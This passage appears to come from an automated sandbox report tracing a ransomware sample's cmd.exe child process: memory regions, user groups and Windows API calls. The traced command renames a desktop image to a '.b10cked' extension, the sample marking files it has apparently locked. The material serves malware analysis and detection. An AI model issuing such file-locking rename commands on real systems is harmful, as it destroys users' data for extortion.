\"C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32944 start_va = 0x10000 end_va = 
0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32945 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32946 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32947 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 32948 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32949 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32950 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32951 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32952 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 32953 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33128 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33129 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" 
filename = "" Region: id = 33130 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33131 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 33132 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 33133 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33134 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33135 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33136 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33137 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33138 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33139 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type 
= mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33140 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33141 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33142 start_va = 0xd0000 end_va = 0x197fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 33143 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33144 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33145 start_va = 0x1a0000 end_va = 0x1a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 33146 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 33147 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 33148 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 33149 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 33150 start_va = 0x500000 end_va = 0x10fffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000500000" filename = "" Region: id = 33151 start_va = 0x1100000 end_va = 0x1262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Thread: id = 782 os_tid = 0xe4c [0220.659] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2eff5c | out: lpSystemTimeAsFileTime=0x2eff5c*(dwLowDateTime=0xb85398a0, dwHighDateTime=0x1d440a9)) [0220.659] GetCurrentProcessId () returned 0xedc [0220.659] GetCurrentThreadId () returned 0xe4c [0220.659] GetTickCount () returned 0x3d93e [0220.659] QueryPerformanceCounter (in: lpPerformanceCount=0x2eff54 | out: lpPerformanceCount=0x2eff54*=27744865440) returned 1 [0220.660] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.660] __set_app_type (_Type=0x1) [0220.660] __p__fmode () returned 0x76b331f4 [0220.660] __p__commode () returned 0x76b331fc [0220.660] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.660] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.660] GetCurrentThreadId () returned 0xe4c [0220.660] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe4c) returned 0x38 [0220.660] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.660] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.661] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.661] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.661] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efeec | out: phkResult=0x2efeec*=0x0) returned 0x2 [0220.661] VirtualQuery (in: lpAddress=0x2eff23, lpBuffer=0x2efebc, dwLength=0x1c | out: lpBuffer=0x2efebc*(BaseAddress=0x2ef000, 
AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.661] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efebc, dwLength=0x1c | out: lpBuffer=0x2efebc*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.661] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efebc, dwLength=0x1c | out: lpBuffer=0x2efebc*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.661] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efebc, dwLength=0x1c | out: lpBuffer=0x2efebc*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.661] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efebc, dwLength=0x1c | out: lpBuffer=0x2efebc*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0220.661] GetConsoleOutputCP () returned 0x1b5 [0220.661] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.661] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.661] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.661] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.661] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.661] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.662] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.662] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.662] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.662] _get_osfhandle (_FileHandle=0) returned 0x3 
[0220.662] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.662] GetEnvironmentStringsW () returned 0x410178* [0220.662] FreeEnvironmentStringsW (penv=0x410178) returned 1 [0220.662] GetEnvironmentStringsW () returned 0x410178* [0220.663] FreeEnvironmentStringsW (penv=0x410178) returned 1 [0220.663] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eee5c | out: phkResult=0x2eee5c*=0x40) returned 0x0 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x0, lpData=0x2eee68*=0xa0, lpcbData=0x2eee60*=0x1000) returned 0x2 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x4, lpData=0x2eee68*=0x1, lpcbData=0x2eee60*=0x4) returned 0x0 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x0, lpData=0x2eee68*=0x1, lpcbData=0x2eee60*=0x1000) returned 0x2 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x4, lpData=0x2eee68*=0x0, lpcbData=0x2eee60*=0x4) returned 0x0 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x4, lpData=0x2eee68*=0x40, lpcbData=0x2eee60*=0x4) returned 0x0 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x4, lpData=0x2eee68*=0x40, lpcbData=0x2eee60*=0x4) returned 0x0 [0220.663] RegQueryValueExW (in: hKey=0x40, 
lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x0, lpData=0x2eee68*=0x40, lpcbData=0x2eee60*=0x1000) returned 0x2 [0220.663] RegCloseKey (hKey=0x40) returned 0x0 [0220.663] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eee5c | out: phkResult=0x2eee5c*=0x40) returned 0x0 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x0, lpData=0x2eee68*=0x40, lpcbData=0x2eee60*=0x1000) returned 0x2 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x4, lpData=0x2eee68*=0x1, lpcbData=0x2eee60*=0x4) returned 0x0 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x0, lpData=0x2eee68*=0x1, lpcbData=0x2eee60*=0x1000) returned 0x2 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x4, lpData=0x2eee68*=0x0, lpcbData=0x2eee60*=0x4) returned 0x0 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x4, lpData=0x2eee68*=0x9, lpcbData=0x2eee60*=0x4) returned 0x0 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x4, lpData=0x2eee68*=0x9, lpcbData=0x2eee60*=0x4) returned 0x0 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, 
lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x0, lpData=0x2eee68*=0x9, lpcbData=0x2eee60*=0x1000) returned 0x2 [0220.663] RegCloseKey (hKey=0x40) returned 0x0 [0220.663] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.663] srand (_Seed=0x5b8863b6) [0220.663] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png.b10cked\"" [0220.663] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png.b10cked\"" [0220.664] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.664] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4118d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.664] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.664] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.664] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.664] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.664] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.664] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.664] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.664] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.664] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.664] _wcsicmp 
(_String1="PROMPT", _String2="RANDOM") returned -2 [0220.664] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.664] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.664] GetEnvironmentStringsW () returned 0x4122c8* [0220.665] FreeEnvironmentStringsW (penv=0x4122c8) returned 1 [0220.665] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.665] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.665] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.665] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.665] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.665] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.665] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.665] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.665] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.665] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.665] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2efc28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.665] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2efc28, lpFilePart=0x2efc24 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2efc24*="Desktop") returned 0x18 [0220.665] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.665] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef9a4 | out: lpFindFileData=0x2ef9a4) returned 0x410008 [0220.665] FindClose (in: hFindFile=0x410008 | out: hFindFile=0x410008) returned 1 [0220.665] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef9a4 | out: 
lpFindFileData=0x2ef9a4) returned 0x410008 [0220.665] FindClose (in: hFindFile=0x410008 | out: hFindFile=0x410008) returned 1 [0220.666] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef9a4 | out: lpFindFileData=0x2ef9a4) returned 0x410008 [0220.666] FindClose (in: hFindFile=0x410008 | out: hFindFile=0x410008) returned 1 [0220.666] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.666] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.666] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.666] GetEnvironmentStringsW () returned 0x412ae8* [0220.666] FreeEnvironmentStringsW (penv=0x412ae8) returned 1 [0220.666] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.667] GetConsoleOutputCP () returned 0x1b5 [0220.667] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.667] GetUserDefaultLCID () returned 0x409 [0220.667] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.667] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efd68, cchData=128 | out: lpLCData="0") returned 2 [0220.667] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efd68, cchData=128 | out: lpLCData="0") returned 2 [0220.667] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efd68, cchData=128 | out: lpLCData="1") returned 2 [0220.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: 
lpLCData="Tue") returned 4 [0220.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.668] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.668] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.668] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.669] GetConsoleTitleW (in: lpConsoleTitle=0x4008d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.669] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.669] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.669] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.669] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.670] _wcsicmp (_String1="move", _String2=")") returned 68 [0220.670] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0220.670] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0220.670] _wcsicmp (_String1="IF", _String2="move") returned -4 [0220.670] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0220.670] _wcsicmp (_String1="REM", _String2="move") returned 5 [0220.670] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0220.673] GetConsoleTitleW (in: 
lpConsoleTitle=0x2efa60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.674] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0220.674] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0220.674] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0220.674] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0220.674] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0220.674] _wcsicmp (_String1="move", _String2="CD") returned 10 [0220.674] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0220.674] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0220.674] _wcsicmp (_String1="move", _String2="REN") returned -5 [0220.674] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0220.674] _wcsicmp (_String1="move", _String2="SET") returned -6 [0220.674] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0220.674] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0220.674] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0220.674] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0220.674] _wcsicmp (_String1="move", _String2="MD") returned 11 [0220.674] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0220.674] _wcsicmp (_String1="move", _String2="RD") returned -5 [0220.674] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0220.674] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0220.674] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0220.674] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0220.674] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0220.674] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0220.674] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0220.675] _wcsicmp (_String1="move", _String2="VER") returned -9 [0220.675] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0220.675] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0220.675] _wcsicmp 
(_String1="move", _String2="SETLOCAL") returned -6 [0220.675] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0220.675] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0220.675] _wcsicmp (_String1="move", _String2="START") returned -6 [0220.675] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0220.675] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0220.675] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0220.676] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.676] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.677] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef81c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef814, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef814*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0220.677] _wcsnicmp 
